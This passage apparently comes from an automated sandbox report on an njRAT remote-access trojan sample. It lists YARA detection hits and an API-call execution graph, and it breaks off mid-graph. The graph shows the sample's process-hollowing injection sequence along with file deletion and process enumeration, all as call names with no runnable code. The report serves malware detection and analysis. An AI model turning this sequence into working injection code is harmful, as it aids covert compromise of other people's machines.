                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:28.8%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:10.8%
                                                                                          Total number of Nodes:1180
                                                                                          Total number of Limit Nodes:13
                                                                                          execution_graph 1940 40a940 GetWindowRect 1941 40aa54 ClientToScreen 6CF023F0 1940->1941 1942 40a99f 1940->1942 1943 40aa83 6CF37850 1941->1943 1942->1943 1952 4052c0 CopyRect 1942->1952 1945 40a9d0 _ftol 1945->1943 1946 40a9ec 1945->1946 1946->1943 1947 40a9f7 6CF39B80 GetWindowRect 6CEFE6C0 1946->1947 1948 405300 53 API calls 1947->1948 1949 40aa30 SetWindowRgn 1948->1949 1953 40a440 IsIconic 1949->1953 1952->1945 1954 40a474 7 API calls 1953->1954 1955 40a50d 1953->1955 1956 40a767 1954->1956 1955->1956 1957 40a51b 6CF016C0 6CF37140 1955->1957 1956->1943 1958 40a546 1957->1958 1959 40a642 1958->1959 1960 40a593 73A24C40 6CEFE720 LPtoDP 73A24C00 6CF376C0 1958->1960 1962 40a65a GetWindowRect 6CEFE6C0 1959->1962 1971 40abe0 1960->1971 1974 404a40 CopyRect 1962->1974 1963 40a5fd GetMapMode 6CF38460 DPtoLP 6CF387D0 1963->1962 1966 40a712 1970 40a71a 6CF37850 6CF01660 6CF015D0 1966->1970 1967 40a6ad 73A24D40 1968 40a702 6CF38160 1967->1968 1969 40a6f3 6CF38160 1967->1969 1968->1970 1969->1970 1970->1956 1972 40abf5 6CF38160 1971->1972 1973 40abe8 6CF38160 1971->1973 1972->1963 1973->1963 2045 4039c0 6CF37080 6CF37160 6CEF2DD0 1974->2045 1976 404a71 CopyRect 1977 4039c0 14 API calls 1976->1977 1978 404a91 CopyRect 1977->1978 1979 4039c0 14 API calls 1978->1979 1980 404ab1 CopyRect 1979->1980 1981 4039c0 14 API calls 1980->1981 1982 404ad1 CopyRect 1981->1982 1983 4039c0 14 API calls 1982->1983 1984 404af1 CopyRect 1983->1984 1985 4039c0 14 API calls 1984->1985 1986 404b11 CopyRect 1985->1986 1987 4039c0 14 API calls 1986->1987 1988 404b31 CopyRect 1987->1988 1989 4039c0 14 API calls 1988->1989 1990 404b51 CopyRect 1989->1990 1991 4039c0 14 API calls 1990->1991 1992 404b71 CopyRect 1991->1992 1993 4039c0 14 API calls 1992->1993 1994 404b91 CopyRect 1993->1994 1995 4039c0 14 API calls 1994->1995 1996 404bb1 CopyRect 1995->1996 1997 4039c0 14 API calls 1996->1997 1998 404bd1 CopyRect 1997->1998 1999 4039c0 14 API calls 1998->1999 2000 404bf1 CopyRect 1999->2000 2001 4039c0 14 API calls 2000->2001 2002 404c11 CopyRect 2001->2002 2003 4039c0 14 API calls 2002->2003 2004 404c31 CopyRect 2003->2004 2005 4039c0 14 API calls 2004->2005 2006 404c51 CopyRect 2005->2006 2007 4039c0 14 API calls 2006->2007 2008 404c71 CopyRect 2007->2008 2009 4039c0 14 API calls 2008->2009 2010 404c91 CopyRect 2009->2010 2011 4039c0 14 API calls 2010->2011 2012 404cb1 CopyRect 2011->2012 2013 4039c0 14 API calls 2012->2013 2014 404cd1 CopyRect 2013->2014 2015 4039c0 14 API calls 2014->2015 2016 404cf1 CopyRect 2015->2016 2017 4039c0 14 API calls 2016->2017 2018 404d11 CopyRect 2017->2018 2019 4039c0 14 API calls 2018->2019 2020 404d31 CopyRect 2019->2020 2021 4039c0 14 API calls 2020->2021 2022 404d51 CopyRect 2021->2022 2023 4039c0 14 API calls 2022->2023 2024 404d71 CopyRect 2023->2024 2025 4039c0 14 API calls 2024->2025 2026 404d91 CopyRect 2025->2026 2027 4039c0 14 API calls 2026->2027 2028 404db1 CopyRect 2027->2028 2029 4039c0 14 API calls 2028->2029 2030 404dd1 CopyRect 2029->2030 2031 4039c0 14 API calls 2030->2031 2032 404df1 CopyRect 2031->2032 2033 4039c0 14 API calls 2032->2033 2034 404e11 CopyRect 2033->2034 2035 4039c0 14 API calls 2034->2035 2036 404e31 CopyRect 2035->2036 2037 4039c0 14 API calls 2036->2037 2038 404e51 CopyRect 2037->2038 2039 4039c0 14 API calls 2038->2039 2040 404e71 CopyRect 2039->2040 2041 4039c0 14 API calls 2040->2041 2042 404e91 CopyRect 2041->2042 2043 4039c0 14 API calls 2042->2043 2044 404eb1 6CEFFEB0 2043->2044 2044->1966 2044->1967 2046 403ad9 2045->2046 2047 403bbc 2045->2047 2049 403bc9 6CF37850 6CF37850 2046->2049 2050 403b62 6 API calls 2046->2050 2051 403b03 _ftol _ftol 2046->2051 2048 403bc0 6CEF2C70 2047->2048 2047->2049 2048->2049 2049->1976 2050->2047 2051->2051 2052 403b5e 2051->2052 2052->2050 1702 40a280 1711 405a10 1702->1711 1704 40a2a7 1705 405a10 103 API calls 1704->1705 1706 40a2b0 SendMessageA SendMessageA GetWindowRect 1705->1706 1837 4052c0 CopyRect 1706->1837 1708 40a30b _ftol 6CF39B80 GetWindowRect 6CEFE6C0 1838 405300 CopyRect 1708->1838 1909 40b0e0 1711->1909 1714 407516 LoadLibraryA 1716 407568 LoadLibraryA 1714->1716 1718 407652 LoadLibraryA 1716->1718 1719 40766b LoadLibraryA 1718->1719 1720 407681 LoadLibraryA 1719->1720 1721 407694 LoadLibraryA 1720->1721 1722 4076a4 LoadLibraryA 1721->1722 1723 4076ba LoadLibraryA 1722->1723 1724 4076ca LoadLibraryA 1723->1724 1725 4076da LoadLibraryA 1724->1725 1726 4076ea LoadLibraryA 1725->1726 1728 4077b1 LoadLibraryA 1726->1728 1729 4077c1 LoadLibraryA 1728->1729 1730 4077d1 LoadLibraryA 1729->1730 1731 4077e7 LoadLibraryA 1730->1731 1732 4077fd LoadLibraryA 1731->1732 1733 407813 LoadLibraryA 1732->1733 1734 407829 LoadLibraryA 1733->1734 1735 40783f LoadLibraryA 1734->1735 1736 40784f LoadLibraryA 1735->1736 1737 407865 LoadLibraryA 1736->1737 1738 40787b LoadLibraryA 1737->1738 1740 407a48 1738->1740 1741 407ad3 GetModuleFileNameW 1740->1741 1743 408afd 1740->1743 1751 408e4b 1740->1751 1742 407b09 wcscpy 1741->1742 1762 407b25 wcscpy wcscat wcscpy wcscat wcscat 1741->1762 1742->1762 1745 408c26 CreateFileW 1743->1745 1746 408cf7 1743->1746 1792 408b16 1743->1792 1745->1751 1754 408c78 CreateFileW 1745->1754 1749 408d00 CreateToolhelp32Snapshot 1746->1749 1758 408e47 1746->1758 1748 408158 CreateProcessW 1753 40818d Wow64GetThreadContext NtReadVirtualMemory NtUnmapViewOfSection NtUnmapViewOfSection 1748->1753 1798 408225 1748->1798 1750 408d9c Process32First 1749->1750 1749->1751 1763 408de6 1750->1763 1764 408e2d FindCloseChangeNotification 1750->1764 1751->1704 1756 4081f7 NtUnmapViewOfSection NtUnmapViewOfSection 1753->1756 1754->1751 1755 408c99 CreateFileW 1754->1755 1755->1751 1757 408cbc CreateFileW 1755->1757 1756->1798 1757->1751 1761 408cdd FindCloseChangeNotification 1757->1761 1758->1751 1765 408f3a CreateFileA 1758->1765 1760 408272 VirtualAllocEx 1760->1798 1766 408ce7 1761->1766 1762->1748 1763->1764 1773 408df7 strstr 1763->1773 1764->1704 1765->1751 1767 408fc7 CreateFileA 1765->1767 1766->1704 1767->1751 1770 408fe9 CreateFileW 1767->1770 1768 4082d8 VirtualAllocEx WriteProcessMemory WriteProcessMemory 1768->1798 1769 4082b6 VirtualAllocEx 1769->1798 1781 40903b wcslen CreateFileW 1770->1781 1771 408327 WriteProcessMemory 1771->1771 1771->1798 1772 4083da WriteProcessMemory Wow64SetThreadContext GetPEB 1775 40844e WriteProcessMemory ResumeThread Wow64SuspendThread WriteProcessMemory 1772->1775 1772->1798 1776 408e3a 1773->1776 1777 408e0b strstr 1773->1777 1774 40838c WriteProcessMemory 1774->1772 1774->1774 1775->1798 1776->1704 1777->1763 1777->1776 1779 4084c1 wcscpy wcscat MoveFileExW CopyFileW 1782 4087f8 ResumeThread 1779->1782 1779->1798 1780 4089af ResumeThread 1780->1798 1783 409077 wcscat CreateFileW 1781->1783 1782->1798 1788 409111 1783->1788 1789 40911a VirtualAlloc 1783->1789 1784 408a4d wcscat 1787 408a77 wcsstr 1784->1787 1785 408813 Sleep CreateToolhelp32Snapshot Module32First 1785->1798 1790 408a8f CreateFileW 1787->1790 1787->1798 1788->1789 1793 409148 ReadFile 1789->1793 1790->1798 1791 408900 Wow64SuspendThread 1791->1798 1792->1704 1802 40915c FindCloseChangeNotification 1793->1802 1794 408945 ResumeThread Sleep DeleteFileW 1797 408977 Wow64SuspendThread 1794->1797 1794->1798 1795 4088c8 strstr 1795->1798 1799 40891b Wow64SuspendThread FindCloseChangeNotification DeleteFileW 1795->1799 1796 408ad8 TerminateProcess 1796->1798 1801 408988 Sleep MoveFileExW 1797->1801 1798->1743 1798->1748 1798->1760 1798->1768 1798->1769 1798->1771 1798->1772 1798->1774 1798->1779 1798->1780 1798->1782 1798->1784 1798->1785 1798->1791 1798->1794 1798->1795 1798->1796 1798->1801 1799->1798 1801->1780 1801->1798 1804 4091c3 VirtualAlloc 1802->1804 1807 4092a3 1804->1807 1805 409b8a 1806 405a10 ExitProcess 1805->1806 1809 409bd6 1806->1809 1807->1805 1808 409409 1807->1808 1811 405a10 ExitProcess 1807->1811 1812 409428 1808->1812 1816 405a10 ExitProcess 1808->1816 1810 409be6 1809->1810 1817 405a10 ExitProcess 1809->1817 1813 409c07 1810->1813 1814 409c1e 1810->1814 1815 4093fd 1811->1815 1818 405a10 ExitProcess 1812->1818 1835 40949e 1812->1835 1819 405a10 ExitProcess 1813->1819 1821 409c27 1814->1821 1822 409c3e 1814->1822 1815->1808 1820 409404 1815->1820 1823 40941c 1816->1823 1817->1810 1824 40945b 1818->1824 1825 409c12 1819->1825 1911 405a00 ExitProcess 1820->1911 1827 405a10 ExitProcess 1821->1827 1829 405a10 ExitProcess 1822->1829 1823->1812 1828 409423 1823->1828 1833 405a10 ExitProcess 1824->1833 1824->1835 1825->1704 1830 409c32 1827->1830 1912 405a00 ExitProcess 1828->1912 1829->1751 1830->1704 1832 409a05 1832->1805 1834 405a10 ExitProcess 1832->1834 1833->1835 1834->1805 1835->1832 1836 40996b CreateProcessA Sleep TerminateProcess 1835->1836 1836->1832 1837->1708 1913 403e10 1838->1913 1840 405331 CopyRect 1841 403e10 18 API calls 1840->1841 1842 405351 CopyRect 1841->1842 1843 403e10 18 API calls 1842->1843 1844 405371 CopyRect 1843->1844 1845 403e10 18 API calls 1844->1845 1846 405391 CopyRect 1845->1846 1847 403e10 18 API calls 1846->1847 1848 4053b1 CopyRect 1847->1848 1849 403e10 18 API calls 1848->1849 1850 4053d1 CopyRect 1849->1850 1851 403e10 18 API calls 1850->1851 1852 4053f1 CopyRect 1851->1852 1853 403e10 18 API calls 1852->1853 1854 405411 CopyRect 1853->1854 1855 403e10 18 API calls 1854->1855 1856 405431 CopyRect 1855->1856 1857 403e10 18 API calls 1856->1857 1858 405451 CopyRect 1857->1858 1859 403e10 18 API calls 1858->1859 1860 405471 CopyRect 1859->1860 1861 403e10 18 API calls 1860->1861 1862 405491 CopyRect 1861->1862 1863 403e10 18 API calls 1862->1863 1864 4054b1 CopyRect 1863->1864 1865 403e10 18 API calls 1864->1865 1866 4054d1 CopyRect 1865->1866 1867 403e10 18 API calls 1866->1867 1868 4054f1 CopyRect 1867->1868 1869 403e10 18 API calls 1868->1869 1870 405511 CopyRect 1869->1870 1871 403e10 18 API calls 1870->1871 1872 405531 CopyRect 1871->1872 1873 403e10 18 API calls 1872->1873 1874 405551 CopyRect 1873->1874 1875 403e10 18 API calls 1874->1875 1876 405571 CopyRect 1875->1876 1877 403e10 18 API calls 1876->1877 1878 405591 CopyRect 1877->1878 1879 403e10 18 API calls 1878->1879 1880 4055b1 CopyRect 1879->1880 1881 403e10 18 API calls 1880->1881 1882 4055d1 CopyRect 1881->1882 1883 403e10 18 API calls 1882->1883 1884 4055f1 CopyRect 1883->1884 1885 403e10 18 API calls 1884->1885 1886 405611 CopyRect 1885->1886 1887 403e10 18 API calls 1886->1887 1888 405631 CopyRect 1887->1888 1889 403e10 18 API calls 1888->1889 1890 405651 CopyRect 1889->1890 1891 403e10 18 API calls 1890->1891 1892 405671 CopyRect 1891->1892 1893 403e10 18 API calls 1892->1893 1894 405691 CopyRect 1893->1894 1895 403e10 18 API calls 1894->1895 1896 4056b1 CopyRect 1895->1896 1897 403e10 18 API calls 1896->1897 1898 4056d1 CopyRect 1897->1898 1899 403e10 18 API calls 1898->1899 1900 4056f1 CopyRect 1899->1900 1901 403e10 18 API calls 1900->1901 1902 405711 CopyRect 1901->1902 1903 403e10 18 API calls 1902->1903 1904 405731 CopyRect 1903->1904 1905 403e10 18 API calls 1904->1905 1906 405751 CopyRect 1905->1906 1907 403e10 18 API calls 1906->1907 1908 405771 SetWindowRgn 6CF30E90 6CF37850 1907->1908 1910 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1909->1910 1910->1714 1914 403e3a 1913->1914 1915 403e57 6CF37080 6CF37160 6CEF2DD0 1914->1915 1916 403f4e 1915->1916 1925 403fcd 1915->1925 1921 403f74 _ftol _ftol 1916->1921 1916->1925 1917 40404a CreatePolygonRgn 6CF376C0 1920 404058 1917->1920 1918 403fdf CreatePolygonRgn 6CF376C0 1919 403ff3 CombineRgn CreatePolygonRgn 6CF376C0 CombineRgn 1918->1919 1919->1920 1923 404065 6CF37850 6CF37850 6CF37850 6CF37850 1920->1923 1924 40405c 6CEF2C70 1920->1924 1921->1921 1921->1925 1923->1840 1924->1923 1925->1917 1925->1918 2077 40ad00 DrawTextA 2457 40aac0 GetClientRect 2463 404ec0 CopyRect 2457->2463 2459 40aae6 2460 40ab0d 2459->2460 2461 40aaf4 6CEF50F0 6CEFF390 2459->2461 2462 40ab29 LoadCursorA SetCursor 2460->2462 2461->2462 2542 403c20 6CEF2DD0 2463->2542 2465 404ef1 2466 404f06 CopyRect 2465->2466 2467 404ef8 2465->2467 2468 403c20 8 API calls 2466->2468 2467->2459 2469 404f23 2468->2469 2470 404f38 CopyRect 2469->2470 2471 404f2a 2469->2471 2472 403c20 8 API calls 2470->2472 2471->2459 2473 404f55 2472->2473 2474 404f6a CopyRect 2473->2474 2475 404f5c 2473->2475 2476 403c20 8 API calls 2474->2476 2475->2459 2477 404f87 2476->2477 2478 404f9c CopyRect 2477->2478 2479 404f8e 2477->2479 2480 403c20 8 API calls 2478->2480 2479->2459 2481 404fb9 2480->2481 2482 404fc0 2481->2482 2483 404fce CopyRect 2481->2483 2482->2459 2484 403c20 8 API calls 2483->2484 2485 404feb 2484->2485 2486 405000 CopyRect 2485->2486 2487 404ff2 2485->2487 2488 403c20 8 API calls 2486->2488 2487->2459 2489 40501d 2488->2489 2490 405032 CopyRect 2489->2490 2491 405024 2489->2491 2492 403c20 8 API calls 2490->2492 2491->2459 2493 40504f 2492->2493 2494 405064 CopyRect 2493->2494 2495 405056 2493->2495 2496 403c20 8 API calls 2494->2496 2495->2459 2497 405081 2496->2497 2498 405096 CopyRect 2497->2498 2499 405088 2497->2499 2500 403c20 8 API calls 2498->2500 2499->2459 2501 4050b3 2500->2501 2502 4050c8 CopyRect 2501->2502 2503 4050ba 2501->2503 2504 403c20 8 API calls 2502->2504 2503->2459 2505 4050e5 2504->2505 2506 4050fa CopyRect 2505->2506 2507 4050ec 2505->2507 2508 403c20 8 API calls 2506->2508 2507->2459 2509 405117 2508->2509 2510 40512c CopyRect 2509->2510 2511 40511e 2509->2511 2512 403c20 8 API calls 2510->2512 2511->2459 2513 405149 2512->2513 2514 405150 2513->2514 2515 40515e CopyRect 2513->2515 2514->2459 2516 403c20 8 API calls 2515->2516 2517 40517b 2516->2517 2518 405190 CopyRect 2517->2518 2519 405182 2517->2519 2520 403c20 8 API calls 2518->2520 2519->2459 2521 4051ad 2520->2521 2522 4051c2 CopyRect 2521->2522 2523 4051b4 2521->2523 2524 403c20 8 API calls 2522->2524 2523->2459 2525 4051df 2524->2525 2526 4051f4 CopyRect 2525->2526 2527 4051e6 2525->2527 2528 403c20 8 API calls 2526->2528 2527->2459 2529 405211 2528->2529 2530 405226 CopyRect 2529->2530 2531 405218 2529->2531 2532 403c20 8 API calls 2530->2532 2531->2459 2533 405243 2532->2533 2534 405258 CopyRect 2533->2534 2535 40524a 2533->2535 2536 403c20 8 API calls 2534->2536 2535->2459 2537 405275 2536->2537 2538 40528a CopyRect 2537->2538 2539 40527c 2537->2539 2540 403c20 8 API calls 2538->2540 2539->2459 2541 4052a7 2540->2541 2541->2459 2543 403d11 2542->2543 2544 403d94 CreatePolygonRgn 6CF376C0 2542->2544 2543->2544 2547 403d37 _ftol _ftol 2543->2547 2545 403db1 PtInRegion 2544->2545 2546 403dca 2544->2546 2545->2546 2548 403dd2 6CEF2C70 2546->2548 2549 403ddb 6CF37850 2546->2549 2547->2547 2550 403d90 2547->2550 2548->2549 2549->2465 2550->2544 2551 4057c0 2552 4057c8 2551->2552 2553 4057d8 2552->2553 2554 4057cf 6CEF2C70 2552->2554 2554->2553 2555 4048c0 2560 4048e0 6CF37850 2555->2560 2557 4048c8 2558 4048d8 2557->2558 2559 4048cf 6CEF2C70 2557->2559 2559->2558 2560->2557 2561 40a3c0 2562 40a422 6CEFFEB0 2561->2562 2563 40a3e6 2561->2563 2566 409c60 6CF30310 2563->2566 2565 40a3ef 6CF309F0 6CF303E0 2566->2565 2590 40ac80 ExtTextOutA 2591 409c80 2596 401000 CopyRect 2591->2596 2593 409cf3 6 API calls 2597 402500 CopyRect 2593->2597 2596->2593 2598 403e10 18 API calls 2597->2598 2599 402531 CopyRect 2598->2599 2928 404850 2599->2928 2601 402551 CopyRect 2602 403e10 18 API calls 2601->2602 2603 402571 CopyRect 2602->2603 2929 404850 2603->2929 2605 402591 CopyRect 2606 403e10 18 API calls 2605->2606 2607 4025b1 CopyRect 2606->2607 2930 404850 2607->2930 2609 4025d1 CopyRect 2610 403e10 18 API calls 2609->2610 2611 4025f1 CopyRect 2610->2611 2931 404850 2611->2931 2613 402611 CopyRect 2614 403e10 18 API calls 2613->2614 2615 402631 CopyRect 2614->2615 2932 404850 2615->2932 2617 402651 CopyRect 2618 403e10 18 API calls 2617->2618 2619 402671 CopyRect 2618->2619 2933 404850 2619->2933 2621 402691 CopyRect 2622 403e10 18 API calls 2621->2622 2623 4026b1 CopyRect 2622->2623 2934 404850 2623->2934 2625 4026d1 CopyRect 2626 403e10 18 API calls 2625->2626 2627 4026f1 CopyRect 2626->2627 2935 404850 2627->2935 2629 402711 CopyRect 2630 403e10 18 API calls 2629->2630 2631 402731 CopyRect 2630->2631 2936 404850 2631->2936 2633 402751 CopyRect 2634 403e10 18 API calls 2633->2634 2635 402771 CopyRect 2634->2635 2937 404850 2635->2937 2637 402791 CopyRect 2638 403e10 18 API calls 2637->2638 2639 4027b1 CopyRect 2638->2639 2938 404850 2639->2938 2641 4027d1 CopyRect 2642 403e10 18 API calls 2641->2642 2643 4027f1 CopyRect 2642->2643 2939 404850 2643->2939 2645 402811 CopyRect 2646 403e10 18 API calls 2645->2646 2647 402831 CopyRect 2646->2647 2940 404850 2647->2940 2649 402851 CopyRect 2650 403e10 18 API calls 2649->2650 2651 402871 CopyRect 2650->2651 2941 404850 2651->2941 2653 402891 CopyRect 2654 403e10 18 API calls 2653->2654 2655 4028b1 CopyRect 2654->2655 2942 404850 2655->2942 2657 4028d1 CopyRect 2658 403e10 18 API calls 2657->2658 2659 4028f1 CopyRect 2658->2659 2943 404850 2659->2943 2661 402911 CopyRect 2662 403e10 18 API calls 2661->2662 2663 402931 CopyRect 2662->2663 2944 404850 2663->2944 2665 402951 CopyRect 2666 403e10 18 API calls 2665->2666 2667 402971 CopyRect 2666->2667 2945 404850 2667->2945 2669 402991 CopyRect 2670 403e10 18 API calls 2669->2670 2671 4029b1 CopyRect 2670->2671 2946 404850 2671->2946 2673 4029d1 CopyRect 2674 403e10 18 API calls 2673->2674 2675 4029f1 CopyRect 2674->2675 2947 404850 2675->2947 2677 402a11 CopyRect 2678 403e10 18 API calls 2677->2678 2679 402a31 CopyRect 2678->2679 2948 404850 2679->2948 2681 402a51 CopyRect 2682 403e10 18 API calls 2681->2682 2683 402a71 CopyRect 2682->2683 2949 404850 2683->2949 2685 402a91 CopyRect 2686 403e10 18 API calls 2685->2686 2687 402ab1 CopyRect 2686->2687 2950 404850 2687->2950 2689 402ad1 CopyRect 2690 403e10 18 API calls 2689->2690 2691 402af1 CopyRect 2690->2691 2951 404850 2691->2951 2693 402b11 CopyRect 2694 403e10 18 API calls 2693->2694 2695 402b31 CopyRect 2694->2695 2952 404850 2695->2952 2697 402b51 CopyRect 2698 403e10 18 API calls 2697->2698 2699 402b71 CopyRect 2698->2699 2953 404850 2699->2953 2701 402b91 CopyRect 2702 403e10 18 API calls 2701->2702 2703 402bb1 CopyRect 2702->2703 2954 404850 2703->2954 2705 402bd1 CopyRect 2706 403e10 18 API calls 2705->2706 2707 402bf1 CopyRect 2706->2707 2955 404850 2707->2955 2709 402c11 CopyRect 2710 403e10 18 API calls 2709->2710 2711 402c31 CopyRect 2710->2711 2956 404850 2711->2956 2713 402c51 CopyRect 2714 403e10 18 API calls 2713->2714 2715 402c71 CopyRect 2714->2715 2957 404850 2715->2957 2717 402c91 CopyRect 2718 403e10 18 API calls 2717->2718 2719 402cb1 CopyRect 2718->2719 2958 404850 2719->2958 2721 402cd1 CopyRect 2722 403e10 18 API calls 2721->2722 2723 402cf1 CopyRect 2722->2723 2959 404850 2723->2959 2725 402d11 CopyRect 2726 403e10 18 API calls 2725->2726 2727 402d31 CopyRect 2726->2727 2960 404850 2727->2960 2729 402d51 CopyRect 2730 403e10 18 API calls 2729->2730 2731 402d71 CopyRect 2730->2731 2961 404850 2731->2961 2733 402d91 CopyRect 2734 403e10 18 API calls 2733->2734 2735 402db1 CopyRect 2734->2735 2962 404850 2735->2962 2737 402dd1 CopyRect 2738 403e10 18 API calls 2737->2738 2739 402df1 CopyRect 2738->2739 2963 404850 2739->2963 2741 402e11 CopyRect 2742 403e10 18 API calls 2741->2742 2743 402e31 CopyRect 2742->2743 2964 404850 2743->2964 2745 402e51 CopyRect 2746 403e10 18 API calls 2745->2746 2747 402e71 CopyRect 2746->2747 2965 404850 2747->2965 2749 402e91 CopyRect 2750 403e10 18 API calls 2749->2750 2751 402eb1 CopyRect 2750->2751 2966 404850 2751->2966 2753 402ed1 CopyRect 2754 403e10 18 API calls 2753->2754 2755 402ef1 CopyRect 2754->2755 2967 404850 2755->2967 2757 402f11 CopyRect 2758 403e10 18 API calls 2757->2758 2759 402f31 CopyRect 2758->2759 2968 404850 2759->2968 2761 402f51 CopyRect 2762 403e10 18 API calls 2761->2762 2763 402f71 CopyRect 2762->2763 2969 404850 2763->2969 2765 402f91 CopyRect 2766 403e10 18 API calls 2765->2766 2767 402fb1 CopyRect 2766->2767 2970 404850 2767->2970 2769 402fd1 CopyRect 2770 403e10 18 API calls 2769->2770 2771 402ff1 CopyRect 2770->2771 2971 404850 2771->2971 2773 403011 CopyRect 2774 403e10 18 API calls 2773->2774 2775 403031 CopyRect 2774->2775 2972 404850 2775->2972 2777 403051 CopyRect 2778 403e10 18 API calls 2777->2778 2779 403071 CopyRect 2778->2779 2973 404850 2779->2973 2781 403091 CopyRect 2782 403e10 18 API calls 2781->2782 2783 4030b1 CopyRect 2782->2783 2974 404850 2783->2974 2785 4030d1 CopyRect 2786 403e10 18 API calls 2785->2786 2787 4030f1 CopyRect 2786->2787 2975 404850 2787->2975 2789 403111 CopyRect 2790 403e10 18 API calls 2789->2790 2791 403131 CopyRect 2790->2791 2976 404850 2791->2976 2793 403151 CopyRect 2794 403e10 18 API calls 2793->2794 2795 403171 CopyRect 2794->2795 2977 404850 2795->2977 2797 403191 CopyRect 2798 403e10 18 API calls 2797->2798 2799 4031b1 CopyRect 2798->2799 2978 404850 2799->2978 2801 4031d1 CopyRect 2802 403e10 18 API calls 2801->2802 2803 4031f1 CopyRect 2802->2803 2979 404850 2803->2979 2805 403211 CopyRect 2806 403e10 18 API calls 2805->2806 2807 403231 CopyRect 2806->2807 2980 404850 2807->2980 2809 403251 CopyRect 2810 403e10 18 API calls 2809->2810 2811 403271 CopyRect 2810->2811 2981 404850 2811->2981 2813 403291 CopyRect 2814 403e10 18 API calls 2813->2814 2815 4032b1 CopyRect 2814->2815 2982 404850 2815->2982 2817 4032d1 CopyRect 2818 403e10 18 API calls 2817->2818 2819 4032f1 CopyRect 2818->2819 2983 404850 2819->2983 2821 403311 CopyRect 2822 403e10 18 API calls 2821->2822 2823 403331 CopyRect 2822->2823 2984 404850 2823->2984 2825 403351 CopyRect 2826 403e10 18 API calls 2825->2826 2827 403371 CopyRect 2826->2827 2985 404850 2827->2985 2829 403391 CopyRect 2830 403e10 18 API calls 2829->2830 2831 4033b1 CopyRect 2830->2831 2986 404850 2831->2986 2833 4033d1 CopyRect 2834 403e10 18 API calls 2833->2834 2835 4033f1 CopyRect 2834->2835 2987 404850 2835->2987 2837 403411 CopyRect 2838 403e10 18 API calls 2837->2838 2839 403431 CopyRect 2838->2839 2988 404850 2839->2988 2841 403451 CopyRect 2842 403e10 18 API calls 2841->2842 2843 403471 CopyRect 2842->2843 2989 404850 2843->2989 2845 403491 CopyRect 2846 403e10 18 API calls 2845->2846 2847 4034b1 CopyRect 2846->2847 2990 404850 2847->2990 2849 4034d1 CopyRect 2850 403e10 18 API calls 2849->2850 2851 4034f1 CopyRect 2850->2851 2991 404850 2851->2991 2853 403511 CopyRect 2854 403e10 18 API calls 2853->2854 2855 403531 CopyRect 2854->2855 2992 404850 2855->2992 2857 403551 CopyRect 2858 403e10 18 API calls 2857->2858 2859 403571 CopyRect 2858->2859 2993 404850 2859->2993 2861 403591 CopyRect 2862 403e10 18 API calls 2861->2862 2863 4035b1 CopyRect 2862->2863 2994 404850 2863->2994 2865 4035d1 CopyRect 2866 403e10 18 API calls 2865->2866 2867 4035f1 CopyRect 2866->2867 2995 404850 2867->2995 2869 403611 CopyRect 2870 403e10 18 API calls 2869->2870 2871 403631 CopyRect 2870->2871 2996 404850 2871->2996 2873 403651 CopyRect 2874 403e10 18 API calls 2873->2874 2875 403671 CopyRect 2874->2875 2876 403e10 18 API calls 2875->2876 2877 403691 CopyRect 2876->2877 2997 404360 2877->2997 2879 4036b1 CopyRect 2880 403e10 18 API calls 2879->2880 2881 4036d1 CopyRect 2880->2881 2882 404360 18 API calls 2881->2882 2883 4036f1 CopyRect 2882->2883 2884 403e10 18 API calls 2883->2884 2885 403711 CopyRect 2884->2885 2886 404360 18 API calls 2885->2886 2887 403731 CopyRect 2886->2887 2888 404360 18 API calls 2887->2888 2889 403751 CopyRect 2888->2889 2890 403e10 18 API calls 2889->2890 2891 403771 CopyRect 2890->2891 2892 404360 18 API calls 2891->2892 2893 403791 CopyRect 2892->2893 2894 403e10 18 API calls 2893->2894 2895 4037b1 CopyRect 2894->2895 2896 404360 18 API calls 2895->2896 2897 4037d1 CopyRect 2896->2897 2898 403e10 18 API calls 2897->2898 2899 4037f1 CopyRect 2898->2899 2900 404360 18 API calls 2899->2900 2901 403811 CopyRect 2900->2901 2902 404360 18 API calls 2901->2902 2903 403831 CopyRect 2902->2903 2904 404360 18 API calls 2903->2904 2905 403851 CopyRect 2904->2905 2906 403e10 18 API calls 2905->2906 2907 403871 CopyRect 2906->2907 2908 403e10 18 API calls 2907->2908 2909 403891 CopyRect 2908->2909 2910 404360 18 